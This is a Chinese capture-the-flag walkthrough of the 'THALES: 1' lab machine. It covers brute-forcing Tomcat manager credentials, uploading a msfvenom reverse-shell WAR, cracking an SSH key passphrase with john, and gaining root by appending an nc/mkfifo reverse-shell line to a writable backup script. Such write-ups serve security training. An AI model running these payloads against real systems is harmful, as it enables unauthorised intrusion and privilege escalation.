Vulhub靶场 -- THALES: 1

admin 2022年8月16日18:17:59安全文章评论6 views1423字阅读4分44秒阅读模式



一、扫描主机


Nmap扫描主机,发现192.168.56.3主机

Vulhub靶场 -- THALES: 1


详细扫描一下

Vulhub靶场 -- THALES: 1


发现开放了22和8080端口,8080为Apache Tomcat/9.0.52服务,查看一下,网上查找了一下,发现不存在公开的漏洞

Vulhub靶场 -- THALES: 1



我们扫一下目录

Vulhub靶场 -- THALES: 1


发现一个登录的链接

Vulhub靶场 -- THALES: 1


还发现一个shell的目录,点击上去发现是个空白目录

Vulhub靶场 -- THALES: 1


猜测可能是某个黑客上传的war包,没再发现什么信息了。结合tomcat和shell目录,可以猜想应该是tomcat后台布置war包getshell,但是管理后台需要用户名和密码登录,可以使用msf进行爆破。

Vulhub靶场 -- THALES: 1


tomcat常见的弱口令,我们保存到一个文本中,准备爆破

user.txtadminmanagerrole1roottomcatboth pass.txtadminmanagerrole1roottomcats3cretvagrant

Vulhub靶场 -- THALES: 1


配置msf的option,进行爆破,爆破出账号tomcat,密码role1

Vulhub靶场 -- THALES: 1

Vulhub靶场 -- THALES: 1

进行登录

Vulhub靶场 -- THALES: 1


登录上去后,查看服务器状态

Vulhub靶场 -- THALES: 1


输入账号密码后登录上去,点击应用程序列表

Vulhub靶场 -- THALES: 1


这里可以上传一个war包(tomcat常见漏洞了)

Vulhub靶场 -- THALES: 1


我们用msf生成一个反弹shell的war包

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.56.4 LPORT=10086 -f war -o revshell.war

Vulhub靶场 -- THALES: 1


进行上传

Vulhub靶场 -- THALES: 1

上传之后,开启监听端口,访问该文件返回反弹shell

Vulhub靶场 -- THALES: 1


收到了一个shell,当前是一个伪shell,输入命令我们让他返回一个正常shell,

python3 -c "import pty;pty.spawn('/bin/bash')"

Vulhub靶场 -- THALES: 1


我们先查看当前用户下的文件

Vulhub靶场 -- THALES: 1

I prepared a backup script for you. The script is in this directory "/usr/local/bin/backup.sh". Good Luck.我给你准备了一个备份脚本。脚本在“/usr/local/bin/backup.sh”目录下。祝你好运。



我们查看user.txt文件,发现没有权限

Vulhub靶场 -- THALES: 1



我们尝试进行提取。我们用sudo -l尝试查看可以执行哪些sudo信息,但是需要输入tomcat的密码,我们输入role1当时显示错误。

Vulhub靶场 -- THALES: 1

我们查看一下有没有什么有用的信息

Vulhub靶场 -- THALES: 1


进入.ssh隐藏目录,发现里面存在公钥和私钥

Vulhub靶场 -- THALES: 1


保存私钥

Vulhub靶场 -- THALES: 1

使用用john去爆破ssh,先用ssh2john.py 脚本编译一下:

/usr/share/john/ssh2john.py id_rsa > crack.txt

Vulhub靶场 -- THALES: 1

进行爆破,爆破出密码为vodka06

john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt

Vulhub靶场 -- THALES: 1


根据之前的账号,进行登录

Vulhub靶场 -- THALES: 1


切换账号

Vulhub靶场 -- THALES: 1


拿到flag

Vulhub靶场 -- THALES: 1


进行提取。之前我们看到的那个提示还没有用上呢,现在我们查看一下那个备份文件的代码

Vulhub靶场 -- THALES: 1


是一个shell文件,并且是能运行命令的,我们再看一下这个文件的权限

Vulhub靶场 -- THALES: 1

发现权限是777,我们是可以编辑的,并且是root用户运行的,我们插入一串反弹shell的命令

"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.3 10087 >/tmp/f"

Vulhub靶场 -- THALES: 1



然后在攻击机开一个端口监听等待连接就好了

Vulhub靶场 -- THALES: 1


成功获取到root权限,查看flag文件

Vulhub靶场 -- THALES: 1


原文始发于微信公众号(GSDK安全团队):Vulhub靶场 -- THALES: 1

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年8月16日18:17:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Vulhub靶场 -- THALES: 1 http://cn-sec.com/archives/1238530.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: